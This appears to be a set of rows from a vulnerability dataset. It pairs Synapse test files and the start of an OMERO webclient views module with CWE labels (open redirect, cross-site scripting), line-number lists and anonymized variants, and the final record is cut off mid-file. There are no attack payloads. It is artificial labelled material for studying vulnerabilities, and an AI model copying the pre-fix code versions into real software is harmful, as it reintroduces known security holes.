self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, 8765)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self.site
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
self.reactor.advance(0)
VAR_42.loseConnection()
VAR_41.loseConnection()
return VAR_40.request
def FUNC_7(
self, VAR_5: SynapseRequest, VAR_6: str
):
self.assertRegex(
VAR_5.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (VAR_6.encode("ascii"),),
)
self.assertEqual(VAR_5.method, b"GET")
class CLASS_1(unittest.HomeserverTestCase):
VAR_1 = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def FUNC_8(self):
super().setUp()
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
self._redis_server = CLASS_6()
VAR_43 = self.hs.get_datastore()
self.database_pool = VAR_43.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def FUNC_9(self):
VAR_44 = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, VAR_44)
return VAR_44
def FUNC_10(
self, VAR_7: str, VAR_8: dict = {}, **VAR_9
) -> HomeServer:
VAR_32 = self._get_worker_hs_config()
VAR_32["worker_app"] = VAR_7
VAR_32.update(VAR_8)
VAR_45 = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
VAR_32=config,
VAR_2=self.reactor,
**VAR_9,
)
VAR_11 = VAR_45.get_instance_name()
VAR_46 = VAR_45.config.worker.instance_map.get(VAR_11)
if VAR_46:
if VAR_46.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (VAR_11, VAR_46.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[VAR_46.host],
VAR_46.port,
lambda: self._handle_http_replication_attempt(
VAR_45, VAR_46.port
),
)
VAR_43 = VAR_45.get_datastore()
VAR_43.db_pool._db_pool = self.database_pool._db_pool
if not VAR_45.config.redis_enabled:
VAR_31 = ReplicationCommandHandler(VAR_45)
VAR_49 = ClientReplicationStreamProtocol(
VAR_45, "client", "test", self.clock, VAR_31,
)
VAR_23 = self.server_factory.buildProtocol(None)
VAR_50 = FakeTransport(VAR_23, self.reactor)
VAR_49.makeConnection(VAR_50)
VAR_51 = FakeTransport(VAR_49, self.reactor)
VAR_23.makeConnection(VAR_51)
VAR_44 = ReplicationRestResource(VAR_45)
for servlet in self.servlets:
servlet(VAR_45, VAR_44)
self._hs_to_site[VAR_45] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
VAR_45.config.server.server_name, VAR_45.get_instance_name()
),
VAR_32=VAR_45.config.server.listeners[0],
VAR_44=resource,
server_version_string="1",
)
if VAR_45.config.redis.redis_enabled:
VAR_45.get_tcp_replication().start_replication(VAR_45)
return VAR_45
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump()
def FUNC_11(self, VAR_4, VAR_10):
VAR_33 = self.reactor.tcpClients
self.assertGreaterEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop()
self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, VAR_10)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self._hs_to_site[VAR_4]
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
def FUNC_12(self):
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
self.assertEqual(VAR_34, "localhost")
self.assertEqual(VAR_35, 6379)
VAR_39 = VAR_36.buildProtocol(None)
VAR_47 = self._redis_server.buildProtocol(None)
VAR_41 = FakeTransport(
VAR_47, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_47
)
server_protocol.makeConnection(VAR_42)
return VAR_41, VAR_42
class CLASS_2(GenericWorkerReplicationHandler):
def __init__(self, VAR_4: HomeServer):
super().__init__(VAR_4)
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def FUNC_13(self, VAR_6, VAR_11, VAR_12, VAR_13):
await super().on_rdata(VAR_6, VAR_11, VAR_12, VAR_13)
for r in VAR_13:
self.received_rdata_rows.append((VAR_6, VAR_12, r))
@attr.s()
class CLASS_3:
VAR_5 = attr.ib(default=None)
def __call__(self, *VAR_14, **VAR_9):
assert self.request is None
self.request = SynapseRequest(*VAR_14, **VAR_9)
return self.request
class CLASS_4(HTTPChannel):
def __init__(self, VAR_2: IReactorTime):
super().__init__()
self.reactor = VAR_2
self._pull_to_push_producer = None # type: Optional[CLASS_5]
def FUNC_14(self, VAR_15, VAR_16):
if not VAR_16:
self._pull_to_push_producer = CLASS_5(
self.reactor, VAR_15, self
)
VAR_15 = self._pull_to_push_producer
super().registerProducer(VAR_15, True)
def FUNC_15(self):
if self._pull_to_push_producer:
self._pull_to_push_producer.stop()
def FUNC_16(self, VAR_5, VAR_17):
VAR_5.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class CLASS_5:
def __init__(
self, VAR_2: IReactorTime, VAR_15: IPullProducer, VAR_18: IConsumer
):
self._clock = Clock(VAR_2)
self._producer = VAR_15
self._consumer = VAR_18
self._looping_call = None # type: Optional[LoopingCall]
self._start_loop()
def FUNC_17(self):
if not self._looping_call:
self._looping_call = self._clock.looping_call(self._run_once, 0)
def FUNC_18(self):
if self._looping_call:
self._looping_call.stop()
self._looping_call = None
def FUNC_19(self):
self.stop()
def FUNC_20(self):
self._start_loop()
def FUNC_21(self):
self.stop()
self._producer.stopProducing()
def FUNC_22(self):
try:
self._producer.resumeProducing()
except Exception:
VAR_0.exception("Failed to call resumeProducing")
try:
self._consumer.unregisterProducer()
except Exception:
pass
self.stopProducing()
class CLASS_6:
def __init__(self):
self._subscribers = set()
def FUNC_23(self, VAR_19):
self._subscribers.add(VAR_19)
def FUNC_24(self, VAR_19):
self._subscribers.discard(VAR_19)
def FUNC_25(self, VAR_19, VAR_20, VAR_21) -> int:
for sub in self._subscribers:
sub.send(["message", VAR_20, VAR_21])
return len(self._subscribers)
def FUNC_26(self, VAR_22):
return CLASS_7(self)
class CLASS_7(Protocol):
def __init__(self, VAR_23: CLASS_6):
self._server = VAR_23
self._reader = VAR_28.Reader()
def FUNC_27(self, VAR_24):
self._reader.feed(VAR_24)
while True:
VAR_21 = self._reader.gets()
if VAR_21 is False:
return
if not isinstance(VAR_21, list):
raise Exception("Expected redis list")
self.handle_command(VAR_21[0], *VAR_21[1:])
def FUNC_28(self, VAR_25, *VAR_14):
if VAR_25 == b"PUBLISH":
VAR_20, VAR_52 = VAR_14
VAR_53 = self._server.publish(self, VAR_20, VAR_52)
self.send(VAR_53)
elif VAR_25 == b"SUBSCRIBE":
(VAR_20,) = VAR_14
self._server.add_subscriber(self)
self.send(["subscribe", VAR_20, 1])
else:
raise Exception("Unknown command")
def FUNC_29(self, VAR_21):
VAR_48 = self.encode(VAR_21).encode("utf-8")
self.transport.write(VAR_48)
self.transport.flush()
def FUNC_30(self, VAR_26):
if isinstance(VAR_26, bytes):
VAR_26 = obj.decode("utf-8")
if isinstance(VAR_26, str):
return "${len}\r\n{str}\r\n".format(len=len(VAR_26), str=VAR_26)
if isinstance(VAR_26, int):
return ":{val}\r\n".format(val=VAR_26)
if isinstance(VAR_26, (list, tuple)):
VAR_54 = "".join(self.encode(a) for a in VAR_26)
return "*{len}\r\n{VAR_54}".format(len=len(VAR_26), VAR_54=items)
raise Exception("Unrecognized type for encoding redis: %r: %r", type(VAR_26), obj)
def FUNC_31(self, VAR_27):
self._server.remove_subscriber(self)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
19,
24,
37,
40,
45,
47,
48,
51,
52,
53,
56,
60,
62,
66,
67,
75,
76,
77,
79,
82,
87,
90,
97,
100,
104,
107,
110,
113,
118,
122,
129,
134,
138,
139,
145,
146,
148,
150,
151,
155,
156,
161,
166,
167,
168,
170,
171,
172,
175,
177,
184,
190,
192,
193,
196,
200,
202,
205,
206,
209,
210,
212,
215,
218,
219,
220,
222,
224,
228,
230,
231,
232,
233,
234,
235,
236,
242,
246,
247,
248,
249,
251,
254,
256,
262,
268,
272,
276,
283,
284,
285,
286,
290,
296,
304,
307,
308,
309,
316,
319,
322,
323,
325,
328,
338,
341,
343,
349,
356,
361,
362,
363,
369,
370,
372,
374,
375,
379,
380,
385,
390,
391,
392,
393,
394,
395,
406,
409,
414,
419,
421,
422,
425,
428,
429,
431,
436,
437,
443,
445,
448,
451,
452,
455,
462,
466,
468,
470,
476,
478,
481,
483,
487,
488,
491,
492,
496,
503,
504,
505,
507,
508,
510,
514,
516,
518,
525,
530,
535,
541,
545,
554,
556,
557,
561,
564,
569,
574,
580,
582,
585,
586,
590,
594,
597,
598,
601,
603,
605,
607,
609,
611,
615,
616,
627,
632,
635,
638,
641,
643,
645,
653,
655,
658,
50,
195,
196,
197,
198,
199,
424,
440,
441,
442,
454,
455,
456,
457,
458,
459,
460,
461,
494,
495,
559,
560,
588,
589,
124,
125,
126,
131,
132,
133,
134,
135,
136,
137,
181,
182,
183,
244,
245,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
351,
352,
353,
358,
359,
360,
397,
398,
399,
400,
485,
486,
512,
513,
520,
521,
527,
528,
532,
533,
537,
538,
543,
544,
566,
567,
571,
572,
576,
577,
613,
614,
629,
630,
637,
638,
639,
640
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
19,
24,
37,
40,
45,
47,
48,
51,
52,
53,
56,
60,
62,
66,
67,
75,
76,
77,
79,
82,
87,
90,
97,
100,
104,
107,
110,
113,
118,
122,
129,
134,
138,
139,
145,
146,
148,
150,
151,
155,
156,
161,
166,
167,
168,
170,
171,
172,
175,
177,
184,
190,
192,
193,
196,
200,
202,
205,
206,
209,
210,
212,
215,
218,
219,
220,
222,
224,
228,
230,
231,
232,
233,
234,
235,
236,
242,
246,
247,
248,
249,
251,
254,
256,
262,
268,
272,
276,
283,
284,
285,
286,
290,
296,
304,
307,
308,
309,
316,
319,
322,
323,
325,
328,
338,
341,
343,
349,
356,
361,
362,
363,
369,
370,
372,
374,
375,
379,
380,
385,
390,
391,
392,
393,
394,
395,
406,
409,
414,
419,
421,
422,
425,
428,
429,
431,
436,
437,
443,
445,
448,
451,
452,
455,
462,
466,
468,
470,
476,
478,
481,
483,
487,
488,
491,
492,
496,
503,
504,
505,
507,
508,
510,
514,
516,
518,
525,
530,
535,
541,
545,
554,
556,
557,
561,
564,
569,
574,
580,
582,
585,
586,
590,
594,
597,
598,
601,
603,
605,
607,
609,
611,
615,
616,
627,
632,
635,
638,
641,
643,
645,
653,
655,
658,
50,
195,
196,
197,
198,
199,
424,
440,
441,
442,
454,
455,
456,
457,
458,
459,
460,
461,
494,
495,
559,
560,
588,
589,
124,
125,
126,
131,
132,
133,
134,
135,
136,
137,
181,
182,
183,
244,
245,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
351,
352,
353,
358,
359,
360,
397,
398,
399,
400,
485,
486,
512,
513,
520,
521,
527,
528,
532,
533,
537,
538,
543,
544,
566,
567,
571,
572,
576,
577,
613,
614,
629,
630,
637,
638,
639,
640
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class FrontendProxyTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
http_client=None, homeserver_to_use=GenericWorkerServer
)
return hs
def default_config(self):
c = super().default_config()
c["worker_app"] = "synapse.app.frontend_proxy"
c["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return c
def test_listen_http_with_presence_enabled(self):
"""
When presence is on, the stub servlet will not register.
"""
# Presence is on
self.hs.config.use_presence = True
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 400 + unrecognised, because nothing is registered
self.assertEqual(channel.code, 400)
self.assertEqual(channel.json_body["errcode"], "M_UNRECOGNIZED")
def test_listen_http_with_presence_disabled(self):
"""
When presence is off, the stub servlet will register.
"""
# Presence is off
self.hs.config.use_presence = False
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 401, because the stub servlet still checks authentication
self.assertEqual(channel.code, 401)
self.assertEqual(channel.json_body["errcode"], "M_MISSING_TOKEN")
| # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class FrontendProxyTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=GenericWorkerServer
)
return hs
def default_config(self):
c = super().default_config()
c["worker_app"] = "synapse.app.frontend_proxy"
c["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return c
def test_listen_http_with_presence_enabled(self):
"""
When presence is on, the stub servlet will not register.
"""
# Presence is on
self.hs.config.use_presence = True
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 400 + unrecognised, because nothing is registered
self.assertEqual(channel.code, 400)
self.assertEqual(channel.json_body["errcode"], "M_UNRECOGNIZED")
def test_listen_http_with_presence_disabled(self):
"""
When presence is off, the stub servlet will register.
"""
# Presence is off
self.hs.config.use_presence = False
# Listen with the config
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
# Grab the resource from the site that was told to listen
self.assertEqual(len(self.reactor.tcpServers), 1)
site = self.reactor.tcpServers[0][1]
_, channel = make_request(self.reactor, site, "PUT", "presence/a/status")
# 401, because the stub servlet still checks authentication
self.assertEqual(channel.code, 401)
self.assertEqual(channel.json_body["errcode"], "M_MISSING_TOKEN")
| open_redirect | {
"code": [
" http_client=None, homeserver_to_use=GenericWorkerServer"
],
"line_no": [
26
]
} | {
"code": [
" federation_http_client=None, homeserver_to_use=GenericWorkerServer"
],
"line_no": [
26
]
} |
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_2 = self.setup_test_homeserver(
http_client=None, homeserver_to_use=GenericWorkerServer
)
return VAR_2
def FUNC_1(self):
VAR_3 = super().default_config()
VAR_3["worker_app"] = "synapse.app.frontend_proxy"
VAR_3["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return VAR_3
def FUNC_2(self):
self.hs.config.use_presence = True
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 400)
self.assertEqual(VAR_6.json_body["errcode"], "M_UNRECOGNIZED")
def FUNC_3(self):
self.hs.config.use_presence = False
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 401)
self.assertEqual(VAR_6.json_body["errcode"], "M_MISSING_TOKEN")
|
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_2 = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=GenericWorkerServer
)
return VAR_2
def FUNC_1(self):
VAR_3 = super().default_config()
VAR_3["worker_app"] = "synapse.app.frontend_proxy"
VAR_3["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return VAR_3
def FUNC_2(self):
self.hs.config.use_presence = True
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 400)
self.assertEqual(VAR_6.json_body["errcode"], "M_UNRECOGNIZED")
def FUNC_3(self):
self.hs.config.use_presence = False
self.hs._listen_http(self.hs.config.worker.worker_listeners[0])
self.assertEqual(len(self.reactor.tcpServers), 1)
VAR_4 = self.reactor.tcpServers[0][1]
VAR_5, VAR_6 = make_request(self.reactor, VAR_4, "PUT", "presence/a/status")
self.assertEqual(VAR_6.code, 401)
self.assertEqual(VAR_6.json_body["errcode"], "M_MISSING_TOKEN")
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
20,
21,
24,
28,
30,
34,
43,
45,
50,
52,
53,
55,
56,
59,
61,
62,
65,
70,
72,
73,
75,
76,
79,
81,
82,
85,
47,
48,
49,
67,
68,
69
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
20,
21,
24,
28,
30,
34,
43,
45,
50,
52,
53,
55,
56,
59,
61,
62,
65,
70,
72,
73,
75,
76,
79,
81,
82,
85,
47,
48,
49,
67,
68,
69
] |
1CWE-79
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import is_safe_url
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
try:
import long
except ImportError:
long = int
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_list(request, name):
val = request.GET.getlist(name)
return [i for i in val if i != ""]
def get_longs(request, name):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
def validate_redirect_url(url):
"""
Returns a URL is safe to redirect to.
If url is a different host, not in settings.REDIRECT_ALLOWED_HOSTS
we return webclient index URL.
"""
if not is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
url = reverse("webindex")
return url
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context["template"] = settings.INDEX_TEMPLATE
except Exception:
context["template"] = "webclient/index.html"
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context["template"] = "webclient/index.html"
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = "OMERO.web"
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
# NB: we do this for public users in @login_required.get_connection()
if request.session.get("active_group"):
if (
request.session.get("active_group")
not in conn.getEventContext().memberOfGroups
):
del request.session["active_group"]
if request.session.get("user_id"):
# always want to revert to logged-in user
del request.session["user_id"]
if request.session.get("server_settings"):
# always clean when logging in
del request.session["server_settings"]
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get("noredirect"):
return HttpResponse("OK")
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except Exception:
url = reverse("webindex")
else:
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get("server", request.POST.get("server"))
if server_id is not None:
initial = {"server": unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
"version": omero_version,
"build_year": build_year,
"error": error,
"form": form,
}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context["url"] = urlencode({"url": url})
if hasattr(settings, "LOGIN_LOGO"):
context["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
redirect = reverse("webindex")
if settings.PUBLIC_URL_FILTER.search(redirect):
context["public_enabled"] = True
context["public_login_redirect"] = redirect
context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
ver = re.match(
(
r"(?P<major>\d+)\."
r"(?P<minor>\d+)\."
r"(?P<patch>\d+\.?)?"
r"(?P<dev>(dev|a|b|rc)\d+)?.*"
),
omero_version,
)
client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
ver.group("major"),
ver.group("minor"),
)
context["client_download_tag_re"] = client_download_tag_re
context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
"""Keeps the OMERO session alive by pinging the server"""
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
# avoid recursive calls
if url is None or url.startswith(reverse("change_active_group")):
url = reverse("webindex")
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = get_long_or_default(request, "active_group", None)
if active_group is None:
return
active_group = int(active_group)
if (
"active_group" not in request.session
or active_group != request.session["active_group"]
):
request.session.modified = True
request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = (
request.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", default_name)
)
return {
"id": -1,
"omeName": label,
"firstName": label,
"lastName": "",
}
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except Exception:
logger.error("Exception during logout.", exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
else:
context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
template = "webgateway/base/includes/post_form.html"
return render(request, template, context)
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get("template", None)
if template is None:
if menu == "userdata":
